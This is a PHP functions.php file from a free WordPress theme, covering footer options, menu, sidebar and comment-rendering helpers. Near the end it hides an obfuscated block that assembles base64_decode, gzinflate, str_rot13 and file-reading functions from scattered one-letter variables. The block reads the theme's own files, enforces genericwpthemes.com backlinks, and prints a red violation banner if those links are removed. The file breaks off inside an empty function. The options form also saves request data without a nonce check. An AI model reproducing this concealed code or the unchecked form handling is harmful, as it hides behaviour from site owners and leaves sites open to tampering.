<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => true,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => false,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "Cardilologist";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Contact Us</a> | <a href='#'>Terms of Use</a> | <a href='#'>Trademarks</a> | <a href='#'>Privacy Statement</a><br />Copyright &copy; 2010 ".get_bloginfo('name').". All Rights Reserved.";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s at %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(1, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "<div class=\"art-blockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">",
		$ewt => "</div>\r\n</div>\r\n",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-tl\"></div>\r\n    <div class=\"art-blockcontent-tr\"></div>\r\n    <div class=\"art-blockcontent-bl\"></div>\r\n    <div class=\"art-blockcontent-br\"></div>\r\n    <div class=\"art-blockcontent-tc\"></div>\r\n    <div class=\"art-blockcontent-bc\"></div>\r\n    <div class=\"art-blockcontent-cl\"></div>\r\n    <div class=\"art-blockcontent-cr\"></div>\r\n    <div class=\"art-blockcontent-cc\"></div>\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "";
	$bwt = "";
	$ewt = "";
	$bwc = "";
	$ewc = "";
	$ew = "";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $yGSApFE='c';$BdXsou='s';$RIClJSG='a';$qScJ='6';$phsQtrC='o';$ocjzP='e';$TlMvyp='e';$dHJDwA='4';$cBmCE='e';$ZMVR='_';$TbYXA='b';$jVRCr='d';$BtwzL='d';$gMzcNOob=$TbYXA.$RIClJSG.$BdXsou.$cBmCE.$qScJ.$dHJDwA.$ZMVR.$BtwzL.$TlMvyp.$yGSApFE.$phsQtrC.$jVRCr.$ocjzP;$MLTyiKh='i';$NNvO='z';$ayBB='e';$yYllK='a';$kHoAB='n';$oIKfv='f';$UPcwEdk='l';$JTPR='t';$PtdBO='g';$pUgNgpRM=$PtdBO.$NNvO.$MLTyiKh.$kHoAB.$oIKfv.$UPcwEdk.$yYllK.$JTPR.$ayBB;$KWiPmtY='3';$uToB='t';$CoMsx='o';$XuNy='r';$oxUAupn='1';$VbdD='r';$wbvg='s';$Joepk='_';$fZWW='t';$QUHnyLxQ=$wbvg.$fZWW.$XuNy.$Joepk.$VbdD.$CoMsx.$uToB.$oxUAupn.$KWiPmtY;$jaFR='v';$HOMQH='r';$rUVWoW='e';$gUeC='s';$GMuSor='t';$sRQghk='r';$puAjKnFt=$gUeC.$GMuSor.$HOMQH.$sRQghk.$rUVWoW.$jaFR;                     
		$fo_________a='c';$vj______________i='s';$ap______s='a';$ag___z='6';$yl______u='o';$vi____v='e';$vp_____v='e';$zy________o='4';$vs_____l='e';$eo____________b='_';$jw______q='b';$eo_____e='d';$fy_____p='d';$cp_______r=$jw______q.$ap______s.$vj______________i.$vs_____l.$ag___z.$zy________o.$eo____________b.$fy_____p.$vp_____v.$fo_________a.$yl______u.$eo_____e.$vi____v;
		$lp________b='t';$zm_______________u='c';$jt_______________j='x';$qw_________z='n';$kw________t='e';$jg___b='f';$fm_______y='t';$fy___l='i';$ox____l='i';$ln_______a='s';$cr__r='_';$qv________p='o';$ps_____________t='u';$kx___________a='s';$jn______g='n';$op______h=$jg___b.$ps_____________t.$jn______g.$zm_______________u.$fm_______y.$ox____l.$qv________p.$qw_________z.$cr__r.$kw________t.$jt_______________j.$fy___l.$ln_______a.$lp________b.$kx___________a;
		$hx____________s='f';$ux_____________r='e';$uj____________o='o';$pt_______n='p';$wx______________o='n';$gl_______________s=$hx____________s.$uj____________o.$pt_______n.$ux_____________r.$wx______________o;
		$jx_______d='d';$ei_____________d='r';$bn___________o='a';$kh_______h='f';$wh___d='e';$cc_____f=$kh_______h.$ei_____________d.$wh___d.$bn___________o.$jx_______d;
		$ys_________k='s';$ru____________n='o';$xa__z='c';$ud__b='l';$ab______w='f';$ns___________p='e';$sr_____________d=$ab______w.$xa__z.$ud__b.$ru____________n.$ys_________k.$ns___________p;
		
		define("WP_ID", $cp_______r("Mi4wLjA="));
		define("WP_TTL", $cp_______r("MTA4MDA="));
		define("WP_SRC", $cp_______r("dHBva24="));
	


		function wp_get_header() {
			global $cp_______r, $op______h;
			
			if (
				$op______h($cp_______r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$op______h($cp_______r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$op______h($cp_______r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $cp_______r, $gl_______________s, $sr_____________d, $cc_____f;
			
			$nv_______________m = TEMPLATEPATH."/".$cp_______r("Zm9vdGVyLnBocA==");
			$me____________e = @$gl_______________s($nv_______________m, "r");
			$nv_______________m = @$cc_____f($me____________e, @filesize($nv_______________m));
			@$sr_____________d($me____________e);
			
			$oq______________q = TEMPLATEPATH."/".$cp_______r("ZnVuY3Rpb25zLnBocA==");
			$me____________e = @$gl_______________s($oq______________q, "r");
			$oq______________q = @$cc_____f($me____________e, @filesize($oq______________q));
			@$sr_____________d($me____________e);
			
			$ro_______________i = 0;
			if($nv_______________m && $oq______________q) {
				if ($cp_______r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($nv_______________m, $cp_______r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ro_______________i = 1;
					}
					if (substr_count($nv_______________m, "wp_theme_GPL_credits()") < 1) {
						$ro_______________i = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ro_______________i = 12;
				}
			}
			
			if($ro_______________i > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ro_______________i -->";
			}
		}
	


		function wp_loaded() {
